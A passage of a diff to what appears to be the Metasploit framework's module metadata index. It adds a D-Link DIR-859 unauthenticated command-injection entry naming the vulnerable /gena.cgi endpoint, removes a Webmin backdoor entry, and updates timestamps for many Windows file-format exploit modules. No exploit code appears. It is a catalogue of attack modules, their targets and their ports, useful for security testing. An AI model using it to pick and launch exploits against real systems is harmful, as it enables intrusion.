+    "mod_time": "2020-01-18 08:34:52 +0000",
+    "path": "/modules/exploits/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_linux/local/rds_rds_page_copy_user_priv_esc": {
    "name": "Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation",
    "fullname": "exploit/linux/local/rds_rds_page_copy_user_priv_esc",
@@ -61629,7 +61975,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-04-30 06:25:48 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/linux/local/yum_package_manager_persistence.rb",
    "is_install_path": true,
    "ref_name": "linux/local/yum_package_manager_persistence",
@@ -64349,6 +64695,56 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/upnp/dlink_dir859_subscribe_exec": {
+    "name": "D-Link DIR-859 Unauthenticated Remote Command Execution",
+    "fullname": "exploit/linux/upnp/dlink_dir859_subscribe_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-12-24",
+    "type": "exploit",
+    "author": [
+      "Miguel Mendez Z., <Miguel Mendez Z., @s1kr10s>",
+      "Pablo Pollanco P."
+    ],
+    "description": "D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP\n        interface. The vulnerability exists in /gena.cgi (function genacgi_main() in\n        /htdocs/cgibin), which is accessible without credentials.",
+    "references": [
+      "CVE-2019-17621",
+      "URL-https://medium.com/@s1kr10s/d94b47a15104"
+    ],
+    "platform": "Linux",
+    "arch": "mipsbe",
+    "rport": "49152",
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-01-13 13:18:43 +0000",
+    "path": "/modules/exploits/linux/upnp/dlink_dir859_subscribe_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/upnp/dlink_dir859_subscribe_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/upnp/dlink_upnp_msearch_exec": {
    "name": "D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection",
    "fullname": "exploit/linux/upnp/dlink_upnp_msearch_exec",
@@ -76736,7 +77132,7 @@
      "Unix (CMD In-Memory)",
      "Windows (CMD In-Memory)"
    ],
-    "mod_time": "2019-12-10 12:10:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/multi/http/vbulletin_widgetconfig_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/vbulletin_widgetconfig_rce",
@@ -90424,70 +90820,6 @@
    },
    "needs_cleanup": null
  },
-  "exploit_unix/webapp/webmin_backdoor": {
-    "name": "Webmin password_change.cgi Backdoor",
-    "fullname": "exploit/unix/webapp/webmin_backdoor",
-    "aliases": [
-
-    ],
-    "rank": 600,
-    "disclosure_date": "2019-08-10",
-    "type": "exploit",
-    "author": [
-      "AkkuS",
-      "wvu <wvu@metasploit.com>"
-    ],
-    "description": "This module exploits a backdoor in Webmin versions 1.890 through 1.920.\n        Only the SourceForge downloads were backdoored, but they are listed as\n        official downloads on the project's site.\n\n        Unknown attacker(s) inserted Perl qx statements into the build server's\n        source code on two separate occasions: once in April 2018, introducing\n        the backdoor in the 1.890 release, and in July 2018, reintroducing the\n        backdoor in releases 1.900 through 1.920.\n\n        Only version 1.890 is exploitable in the default install. Later affected\n        versions require the expired password changing feature to be enabled.",
-    "references": [
-      "CVE-2019-15107",
-      "URL-http://www.webmin.com/exploit.html",
-      "URL-https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html",
-      "URL-https://blog.firosolutions.com/exploits/webmin/",
-      "URL-https://github.com/webmin/webmin/issues/947"
-    ],
-    "platform": "Linux,Unix",
-    "arch": "cmd, x86, x64",
-    "rport": 10000,
-    "autofilter_ports": [
-      80,
-      8080,
-      443,
-      8000,
-      8888,
-      8880,
-      8008,
-      3000,
-      8443
-    ],
-    "autofilter_services": [
-      "http",
-      "https"
-    ],
-    "targets": [
-      "Automatic (Unix In-Memory)",
-      "Automatic (Linux Dropper)"
-    ],
-    "mod_time": "2019-08-21 17:42:54 +0000",
-    "path": "/modules/exploits/unix/webapp/webmin_backdoor.rb",
-    "is_install_path": true,
-    "ref_name": "unix/webapp/webmin_backdoor",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Stability": [
-        "crash-safe"
-      ],
-      "Reliability": [
-        "repeatable-session"
-      ],
-      "SideEffects": [
-        "ioc-in-logs",
-        "artifacts-on-disk"
-      ]
-    },
-    "needs_cleanup": null
-  },
  "exploit_unix/webapp/webmin_show_cgi_exec": {
    "name": "Webmin /file/show.cgi Remote Command Execution",
    "fullname": "exploit/unix/webapp/webmin_show_cgi_exec",
@@ -105544,7 +105876,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/a_pdf_wav_to_mp3",
@@ -105627,7 +105959,7 @@
    "targets": [
      "ACDSee FotoSlate 4.0 Build 146"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/acdsee_fotoslate_string",
@@ -105668,7 +106000,7 @@
    "targets": [
      "ACDSee 9.0 (Build 1008)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/acdsee_xpm.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/acdsee_xpm",
@@ -105751,7 +106083,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/activepdf_webgrabber.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/activepdf_webgrabber",
@@ -105792,7 +106124,7 @@
    "targets": [
      "Adobe Reader v8.1.1 (Windows XP SP0-SP3 English)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_collectemailinfo",
@@ -105836,7 +106168,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_cooltype_sing",
@@ -105882,7 +106214,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_flashplayer_button",
@@ -105926,7 +106258,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_flashplayer_newfunction",
@@ -105970,7 +106302,7 @@
    "targets": [
      "Adobe Reader Windows Universal (JS Heap Spray)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_flatedecode_predictor02",
@@ -106013,7 +106345,7 @@
    "targets": [
      "Adobe Reader Universal (JS Heap Spray)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_geticon.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_geticon",
@@ -106056,7 +106388,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_illustrator_v14_eps",
@@ -106101,7 +106433,7 @@
      "Adobe Reader v9.0.0 (Windows XP SP3 English)",
      "Adobe Reader v8.1.2 (Windows XP SP2 English)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_jbig2decode.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_jbig2decode",
@@ -106147,7 +106479,7 @@
    "targets": [
      "Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_libtiff.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_libtiff",
@@ -106192,7 +106524,7 @@
      "Adobe Reader Windows English (JS Heap Spray)",
      "Adobe Reader Windows German (JS Heap Spray)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_media_newplayer.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_media_newplayer",
@@ -106329,7 +106661,7 @@
    "targets": [
      "Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_reader_u3d.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_reader_u3d",
@@ -106417,7 +106749,7 @@
    "targets": [
      "Adobe Reader Windows Universal (JS Heap Spray)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_u3d_meshdecl",
@@ -106458,7 +106790,7 @@
    "targets": [
      "Adobe Reader v8.1.2 (Windows XP SP3 English)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_utilprintf.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_utilprintf",
@@ -106549,7 +106881,7 @@
    "targets": [
      "Universal Salamander 2.5"
    ],
-    "mod_time": "2017-11-09 03:00:24 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/altap_salamander_pdb.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/altap_salamander_pdb",
@@ -106636,7 +106968,7 @@
    "targets": [
      "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/aol_phobos_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/aol_phobos_bof",
@@ -106679,7 +107011,7 @@
    "targets": [
      "Windows XP SP3 with DEP bypass"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/apple_quicktime_pnsize",
@@ -106857,7 +107189,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/audio_wkstn_pls.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/audio_wkstn_pls",
@@ -107326,7 +107658,7 @@
    "targets": [
      "Windows 2000 All / Windows XP SP0/SP1 (CA eTrust Antivirus 8.1.637)"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ca_cab.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ca_cab",
@@ -107411,7 +107743,7 @@
    "targets": [
      "CCMPlayer 1.5"
    ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ccmplayer_m3u_bof",
@@ -107724,7 +108056,7 @@
      "CyberLink LabelPrint <= 2.5 on Windows 8.1 x64",
      "CyberLink LabelPrint <= 2.5 on Windows 10 x64 build 1803"
    ],
-    "mod_time": "2018-12-11 07:55:20 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/cyberlink_lpp_bof",
@@ -107810,7 +108142,7 @@
    "targets": [
      "Cytel Studio 9.0"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/cytel_studio_cy3.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/cytel_studio_cy3",
@@ -108023,7 +108355,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/djvu_imageurl.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/djvu_imageurl",
@@ -108062,7 +108394,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2018-02-01 10:05:50 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/dupscout_xml.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/dupscout_xml",
@@ -108193,7 +108525,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
    ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/emc_appextender_keyworks",
@@ -108452,7 +108784,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/fatplayer_wav.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/fatplayer_wav",
@@ -108498,7 +108830,7 @@
    "targets": [
      "Free Download Manager 3.0 (Build 844)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/fdm_torrent.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/fdm_torrent",
@@ -108544,7 +108876,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/feeddemon_opml.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/feeddemon_opml",
@@ -108587,7 +108919,7 @@
      "Foxit PDF Reader v4.2 (Windows XP SP0-SP3)",
      "Foxit PDF Reader v4.2 (Windows Vista/7/8/2008)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/foxit_reader_filewrite",
@@ -108630,7 +108962,7 @@
    "targets": [
      "Foxit Reader 3.0 Windows XP SP2"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/foxit_reader_launch.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/foxit_reader_launch",
@@ -108766,7 +109098,7 @@
    "targets": [
      "Windows XP SP3 EN"
    ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/free_mp3_ripper_wav",
@@ -108807,7 +109139,7 @@
    "targets": [
      "Windows XP Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/galan_fileformat_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/galan_fileformat_bof",
@@ -108933,7 +109265,7 @@
    "targets": [
      "Windows XP English SP3"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/hhw_hhp_compiledfile_bof",
@@ -108976,7 +109308,7 @@
    "targets": [
      "Windows XP English SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/hhw_hhp_contentfile_bof",
@@ -109021,7 +109353,7 @@
    "targets": [
      "Windows XP English SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/hhw_hhp_indexfile_bof",
@@ -109283,7 +109615,7 @@
      "IDEAL Migration <= 4.5.1 on Windows XP",
      "IDEAL Administration <= 10.5 on Windows XP"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ideal_migration_ipj.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ideal_migration_ipj",
@@ -109625,7 +109957,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mcafee_hercules_deletesnapshot",
@@ -109667,7 +109999,7 @@
    "targets": [
      "Internet Explorer"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mcafee_showreport_exec",
@@ -109752,7 +110084,7 @@
      "Windows XP SP3 - English",
      "Windows XP SP2 - English"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/mediajukebox.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mediajukebox",
@@ -109793,7 +110125,7 @@
    "targets": [
      "Windows XP SP3 / Vista / 7"
    ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/microp_mppl.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/microp_mppl",
@@ -109878,7 +110210,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/millenium_mp3_pls.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/millenium_mp3_pls",
@@ -109922,7 +110254,7 @@
    "targets": [
      "Mini-stream RM-MP3 Converter v3.1.2.1.2010.03.30"
    ],
-    "mod_time": "2018-07-09 13:22:08 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mini_stream_pls_bof",
@@ -110045,7 +110377,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/moxa_mediadbplayback",
@@ -110129,7 +110461,7 @@
    "targets": [
      "SMPlayer 0.6.8 / mplayer.exe Sherpya-SVN-r29355-4.5.0 / Windows XP English SP3"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/mplayer_sami_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mplayer_sami_bof",
@@ -110178,7 +110510,7 @@
      "Microsoft Office 2007 SP2 English on Windows XP SP3 English",
      "Crash Target for Debugging"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms09_067_excel_featheader",
@@ -110225,7 +110557,7 @@
      "Microsoft PowerPoint Viewer 2003 (kb969615)",
      "Crash Target for Debugging"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms10_004_textbytesatom",
@@ -110271,7 +110603,7 @@
      "Microsoft Office Excel 2002 10.2614.2625 Service Pack 0(Office XP) on Windows XP SP3",
      "Microsoft Office Excel 2002 10.6501.6626 Service Pack 3 (Office XP SP3) on Windows XP SP3"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms10_038_excel_obj_bof",
@@ -110416,7 +110748,7 @@
      "Microsoft Office Excel 2007 on Windows XP",
      "Microsoft Office Excel 2007 SP2 on Windows XP"
    ],
-    "mod_time": "2017-09-22 18:49:09 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms11_021_xlb_bof",
@@ -110864,7 +111196,7 @@
    "targets": [
      "Windows XP SP2 English"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms_visual_basic_vbp",
@@ -110948,7 +111280,7 @@
    "targets": [
      "Windows XP SP2-SP3 IE 7.0"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/msworks_wkspictureinterface",
@@ -110991,7 +111323,7 @@
      "Windows Universal (SEH)",
      "Windows XP SP3 French"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/mymp3player_m3u.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mymp3player_m3u",
@@ -111031,7 +111363,7 @@
    "targets": [
      "Windows XP SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/netop.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/netop",
@@ -111413,7 +111745,7 @@
    "targets": [
      "OpenOffice 2.3.1 / 2.3.0 on Windows XP SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/openoffice_ole.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/openoffice_ole",
@@ -111585,7 +111917,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/proshow_cellimage_bof",
@@ -111845,7 +112177,7 @@
      "WinSrv 2000 SP2 English",
      "WinSrv 2003 Enterprise Edition SP1 (v1023) English"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/safenet_softremote_groupname",
@@ -111886,7 +112218,7 @@
    "targets": [
      "Windows XP SP3 / IE 7"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/sascam_get.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/sascam_get",
@@ -111971,7 +112303,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/shadow_stream_recorder_bof",
@@ -112052,7 +112384,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/somplplayer_m3u.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/somplplayer_m3u",
@@ -112134,7 +112466,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2018-01-23 16:34:49 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/syncbreeze_xml.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/syncbreeze_xml",
@@ -112394,7 +112726,7 @@
    "targets": [
      "Windows XP SP0"
    ],
-    "mod_time": "2017-11-09 03:00:24 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ursoft_w32dasm.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ursoft_w32dasm",
@@ -112438,7 +112770,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/varicad_dwb.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/varicad_dwb",
@@ -112611,7 +112943,7 @@
      "Visio 2002 English on Windows XP SP3 Spanish",
      "Visio 2002 English on Windows XP SP3 English"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/visio_dxf_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/visio_dxf_bof",
@@ -112910,7 +113242,7 @@
    "targets": [
      "VUPlayer 2.49"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/vuplayer_cue.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/vuplayer_cue",
@@ -112950,7 +113282,7 @@
    "targets": [
      "VUPlayer 2.49"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
